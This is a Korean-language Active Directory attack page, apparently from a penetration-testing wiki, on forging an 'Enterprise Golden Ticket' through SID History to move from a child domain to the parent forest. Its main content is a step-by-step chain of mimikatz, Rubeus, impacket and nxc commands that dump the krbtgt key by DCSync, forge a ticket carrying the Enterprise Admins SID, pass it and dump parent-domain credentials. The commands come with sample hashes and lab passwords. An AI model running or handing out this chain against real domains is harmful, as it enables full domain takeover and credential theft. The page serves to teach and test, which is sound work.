Enterprise Golden Ticket

SID History는 도메인 계정이 외부로 마이그레이션 되었다가 돌아오는 경우를 대비하여 기존의 보안 식별자에 대한 정보를 유지하기 위해 사용되는 계정 속성입니다. 대상 도메인이 SID History에 대해 신뢰할 경우, 공격자는 하위 도메인을 장악한 뒤 티켓의 SID History 값을 변조하여 상위 도메인을 장악할 수 있습니다.

부모 자식 관계에서 부모 도메인의 엔터프라이즈 관리자 그룹은 자식 도메인에 대한 GenericAll 권한을 갖고있기 때문에, 자식 도메인에서 SID History를 통해 부모 도메인의 엔터프라이즈 관리자 그룹 SID를 갖는 골든 티켓을 생성한다면, 해당 부모 도메인의 모든 하위 도메인들을 장악할 수 있습니다.

Abuse

mimikatz.exe

# 트러스트 도메인 FQDN 및 SID 수집
.\mimikatz.exe "lsadump::trust" "exit"

# 현재 도메인 krbtgt 비밀 키
.\mimikatz.exe "lsadump::dcsync /user:child\krbtgt /domain:child.contoso.com" "exit"

# 교차 도메인 DCSync
.\mimikatz.exe "kerberos::golden /user:Administrator /krbtgt:6709f2afdea5f9182231dcc25e8430e8 /domain:child.contoso.com /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519" "exit"
.\mimikatz.exe "kerberos::ptt ticket.kirbi" "exit"
.\mimikatz.exe "lsadump::dcsync /domain:contoso.com /dc:ad01.contoso.com /user:contoso\Administrator" "exit"

Rubeus.exe

# 크로스 도메인 SID
(Get-ADDomain -Server 'contoso.com').DomainSID.Value

# 현재 도메인 SID
(Get-ADDomain).DomainSID.Value

# 도메인 골든 티켓 생성
.\Rubeus.exe golden /aes256:f34[...]9c4 /user:Administrator /id:500 /domain:child.contoso.com /sid:<Child Domain Sid> /sids:<Parent Domain Sid> /dc:contoso.com /nowrap

# 크로스 도메인 SID
impacket-lookupsid child.contoso.com/child:'Password123!'@192.168.1.13

# 현재 도메인 SID
nxc ldap child.contoso.com -u Administrator -p 'Password123!' --get-sid

# 현재 도메인 krbtgt 비밀 키
impacket-secretsdump child/Administrator:'Password123!'@192.168.1.30 -just-dc

# 크로스 도메인 골든 티켓 생성
impacket-ticketer -nthash cf5982bea80660350f3cd30c83557ad8 -domain child.contoso.com -domain-sid <Child Domain Sid> -extra-sid <Parent Domain Sid - 519> Administrator

Root Cause

실습 환경에서 CHILD와 KISA는 부모 자식 관계이고 CONTOSO는 외부 포레스트입니다. CONTOSO 도메인은 KISA 도메인의 엔터프라이즈 관리자 그룹에 대해 모든 권한을 위임한 상태이기 때문에 KISA 도메인 관리자는 CONTOSO에 DCSync 권한이 있습니다.